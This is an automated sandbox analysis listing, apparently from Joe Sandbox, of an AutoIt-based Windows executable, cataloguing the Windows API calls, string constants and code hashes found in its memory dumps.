                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EF4D24
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF4D42
                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EF4D68
                      • SendMessageW.USER32(?,00000421,?,?), ref: 00EF4D7D
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EF4D90
                      • IsWindowVisible.USER32(?), ref: 00EF4DB0
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EF4DCB
                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EF4DDF
                      • GetWindowRect.USER32(?,?), ref: 00EF4DF7
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00EF4E1D
                      • GetMonitorInfoW.USER32(00000000,?), ref: 00EF4E37
                      • CopyRect.USER32(?,?), ref: 00EF4E4E
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00EF4EB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
                      • Instruction ID: d9171acf5ac6430cb090adca834e38910d727419ecc10c1ef21943dedf05ca75
                      • Opcode Fuzzy Hash: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
                      • Instruction Fuzzy Hash: 69B148B1604341AFDB04DF65C844B6BBBE4FF88314F009918F699AB2A2DB71EC04CB91
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728BC
                      • GetSystemMetrics.USER32(00000007), ref: 00E728C4
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728EF
                      • GetSystemMetrics.USER32(00000008), ref: 00E728F7
                      • GetSystemMetrics.USER32(00000004), ref: 00E7291C
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E72939
                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E72949
                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E7297C
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E72990
                      • GetClientRect.USER32(00000000,000000FF), ref: 00E729AE
                      • GetStockObject.GDI32(00000011), ref: 00E729CA
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E729D5
                        • Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
                        • Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                        • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
                        • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                      • SetTimer.USER32(00000000,00000000,00000028,00E71256), ref: 00E729FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
                      • API String ID: 1458621304-248962490
                      • Opcode ID: d1ebb8d52daf4ad02defc04055da18f755126ecaa80a35e356b598094a89d19f
                      • Instruction ID: 82fe4ee1aae3f970e5d8a38019094f3db95f63f353acedb7fdc44cffdb1321b6
                      • Opcode Fuzzy Hash: d1ebb8d52daf4ad02defc04055da18f755126ecaa80a35e356b598094a89d19f
                      • Instruction Fuzzy Hash: A1B16C71A0020AAFDB14DFA8DC45BAE7BB5FF48315F109129FA19FA290DB70A845DB50
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00EF40F6
                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EF41B6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                      • API String ID: 3974292440-719923060
                      • Opcode ID: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
                      • Instruction ID: a5ce7e4331400c08f8f110a435a68124e3dbf38f5f22c5869780f9c1bdccfe34
                      • Opcode Fuzzy Hash: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
                      • Instruction Fuzzy Hash: 70A17B702142199FCB14EF24C951A7AB3E5AF84314F14A96DB99ABB3D3DB30ED06CB41
                      APIs
                      • LoadCursorW.USER32(00000000,00007F89), ref: 00EE5309
                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00EE5314
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00EE531F
                      • LoadCursorW.USER32(00000000,00007F03), ref: 00EE532A
                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00EE5335
                      • LoadCursorW.USER32(00000000,00007F01), ref: 00EE5340
                      • LoadCursorW.USER32(00000000,00007F81), ref: 00EE534B
                      • LoadCursorW.USER32(00000000,00007F88), ref: 00EE5356
                      • LoadCursorW.USER32(00000000,00007F80), ref: 00EE5361
                      • LoadCursorW.USER32(00000000,00007F86), ref: 00EE536C
                      • LoadCursorW.USER32(00000000,00007F83), ref: 00EE5377
                      • LoadCursorW.USER32(00000000,00007F85), ref: 00EE5382
                      • LoadCursorW.USER32(00000000,00007F82), ref: 00EE538D
                      • LoadCursorW.USER32(00000000,00007F84), ref: 00EE5398
                      • LoadCursorW.USER32(00000000,00007F04), ref: 00EE53A3
                      • LoadCursorW.USER32(00000000,00007F02), ref: 00EE53AE
                      • GetCursorInfo.USER32(?), ref: 00EE53BE
                      • GetLastError.KERNEL32(00000001,00000000), ref: 00EE53E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Cursor$Load$ErrorInfoLast
                      • String ID:
                      • API String ID: 3215588206-0
                      • Opcode ID: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
                      • Instruction ID: 400fe3bd36d7739c28be7c585744d6d372f0bcd29b4577273a9b062102e9f8f9
                      • Opcode Fuzzy Hash: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
                      • Instruction Fuzzy Hash: BE416071E043196ADB109FBA8C49D6EFEF8EF91B10F10452FE519E7291DAB8A401CE61
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ECAAA5
                      • __swprintf.LIBCMT ref: 00ECAB46
                      • _wcscmp.LIBCMT ref: 00ECAB59
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ECABAE
                      • _wcscmp.LIBCMT ref: 00ECABEA
                      • GetClassNameW.USER32(?,?,00000400), ref: 00ECAC21
                      • GetDlgCtrlID.USER32(?), ref: 00ECAC73
                      • GetWindowRect.USER32(?,?), ref: 00ECACA9
                      • GetParent.USER32(?), ref: 00ECACC7
                      • ScreenToClient.USER32(00000000), ref: 00ECACCE
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ECAD48
                      • _wcscmp.LIBCMT ref: 00ECAD5C
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00ECAD82
                      • _wcscmp.LIBCMT ref: 00ECAD96
                        • Part of subcall function 00E9386C: _iswctype.LIBCMT ref: 00E93874
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                      • String ID: %s%u
                      • API String ID: 3744389584-679674701
                      • Opcode ID: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
                      • Instruction ID: 528855467fb0f243759e6b51a12d2e6cc73c109ec021fda1b3d5c3cee3f70204
                      • Opcode Fuzzy Hash: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
                      • Instruction Fuzzy Hash: ADA1B07120420AAFD714DE20C984FEAFBE8FF4431DF04552DF99AE2190DB31A946CB92
                      APIs
                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00ECB3DB
                      • _wcscmp.LIBCMT ref: 00ECB3EC
                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ECB414
                      • CharUpperBuffW.USER32(?,00000000), ref: 00ECB431
                      • _wcscmp.LIBCMT ref: 00ECB44F
                      • _wcsstr.LIBCMT ref: 00ECB460
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB498
                      • _wcscmp.LIBCMT ref: 00ECB4A8
                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ECB4CF
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB518
                      • _wcscmp.LIBCMT ref: 00ECB528
                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00ECB550
                      • GetWindowRect.USER32(00000004,?), ref: 00ECB5B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                      • String ID: @$ThumbnailClass
                      • API String ID: 1788623398-1539354611
                      • Opcode ID: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
                      • Instruction ID: 7d6b44e0e0238f02c9fe563d80644321cb9651267ed67690a6af42d38f63089b
                      • Opcode Fuzzy Hash: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
                      • Instruction Fuzzy Hash: 6C8180710083059FDB14DF14CA86FAA77E8EF44318F04A56DFD89AA092EB35DD4ACB61
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                      • API String ID: 1038674560-1810252412
                      • Opcode ID: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
                      • Instruction ID: ccc5474f2528179d4bae3ac2807d2855e31ef4e2d03017753259e918e2d5b5e6
                      • Opcode Fuzzy Hash: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
                      • Instruction Fuzzy Hash: AF31C831948315A6DF18FA60DE43FEE77E89F10750F60502DF845720E1EF92AE05D552
                      APIs
                      • LoadIconW.USER32(00000063), ref: 00ECC4D4
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ECC4E6
                      • SetWindowTextW.USER32(?,?), ref: 00ECC4FD
                      • GetDlgItem.USER32(?,000003EA), ref: 00ECC512
                      • SetWindowTextW.USER32(00000000,?), ref: 00ECC518
                      • GetDlgItem.USER32(?,000003E9), ref: 00ECC528
                      • SetWindowTextW.USER32(00000000,?), ref: 00ECC52E
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ECC54F
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ECC569
                      • GetWindowRect.USER32(?,?), ref: 00ECC572
                      • SetWindowTextW.USER32(?,?), ref: 00ECC5DD
                      • GetDesktopWindow.USER32 ref: 00ECC5E3
                      • GetWindowRect.USER32(00000000), ref: 00ECC5EA
                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ECC636
                      • GetClientRect.USER32(?,?), ref: 00ECC643
                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ECC668
                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ECC693
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                      • String ID:
                      • API String ID: 3869813825-0
                      • Opcode ID: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
                      • Instruction ID: b237d1741d5af3ffbe4ac025e6893422987c36dccd1a61db6b269148fd45acfd
                      • Opcode Fuzzy Hash: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
                      • Instruction Fuzzy Hash: B4517C70900709AFDB209FA9CE85F6EBBF5FF44708F10492CE686B25A0CB75A945CB40
                      APIs
                      • _memset.LIBCMT ref: 00EFA4C8
                      • DestroyWindow.USER32(?,?), ref: 00EFA542
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EFA5BC
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EFA5DE
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA5F1
                      • DestroyWindow.USER32(00000000), ref: 00EFA613
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EFA64A
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA663
                      • GetDesktopWindow.USER32 ref: 00EFA67C
                      • GetWindowRect.USER32(00000000), ref: 00EFA683
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EFA69B
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EFA6B3
                        • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                      • String ID: 0$tooltips_class32
                      • API String ID: 1297703922-3619404913
                      • Opcode ID: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
                      • Instruction ID: 0ae913a5509fe34183f82f91d4888fbed1772d3d65c0f93d75b26d48bb8d1e07
                      • Opcode Fuzzy Hash: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
                      • Instruction Fuzzy Hash: 18716BB1140209AFD720CF28C845F767BE6EF88304F09452DFA89EB2A1DB70E905DB56
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • DragQueryPoint.SHELL32(?,?), ref: 00EFC917
                        • Part of subcall function 00EFADF1: ClientToScreen.USER32(?,?), ref: 00EFAE1A
                        • Part of subcall function 00EFADF1: GetWindowRect.USER32(?,?), ref: 00EFAE90
                        • Part of subcall function 00EFADF1: PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFC980
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EFC98B
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EFC9AE
                      • _wcscat.LIBCMT ref: 00EFC9DE
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EFC9F5
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCA0E
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA25
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA47
                      • DragFinish.SHELL32(?), ref: 00EFCA4E
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EFCB41
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                      • API String ID: 169749273-3440237614
                      • Opcode ID: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
                      • Instruction ID: 137ad8aec1931496ff0bae534e077eea30b3c7a5aa02d4b18a17b1bfe5f1c222
                      • Opcode Fuzzy Hash: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
                      • Instruction Fuzzy Hash: D7617A71108304AFC711EF60DC85DAFBBE8EFC8710F10492EF695A61A1DB709A49CB92
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00EF46AB
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF46F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 3974292440-4258414348
                      • Opcode ID: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
                      • Instruction ID: d8c7500b85dc4d00ed289c39d4aee52f61d180cb774cafb87f14dc696f029277
                      • Opcode Fuzzy Hash: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
                      • Instruction Fuzzy Hash: 6D9169742043059FCB14EF20C451A6AB7E1AF84314F05A86DF99A7B3A3DB31ED4ACB81
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EFBB6E
                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00EF6D80,?), ref: 00EFBBCA
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC03
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EFBC46
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC7D
                      • FreeLibrary.KERNEL32(?), ref: 00EFBC89
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EFBC99
                      • DestroyIcon.USER32(?), ref: 00EFBCA8
                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EFBCC5
                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EFBCD1
                        • Part of subcall function 00E9313D: __wcsicmp_l.LIBCMT ref: 00E931C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                      • String ID: .dll$.exe$.icl
                      • API String ID: 1212759294-1154884017
                      • Opcode ID: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
                      • Instruction ID: 08ae7f39b066d29435036b02151185ab5f3ae16d2b287dc185b897f9bf469184
                      • Opcode Fuzzy Hash: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
                      • Instruction Fuzzy Hash: 0A61CF71500219BEEF14DF65CC85FBABBA8EF08710F10911AFE15E61D1DB74AA94CBA0
                      APIs
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • CharLowerBuffW.USER32(?,?), ref: 00EDA636
                      • GetDriveTypeW.KERNEL32 ref: 00EDA683
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA6CB
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA702
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA730
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 2698844021-4113822522
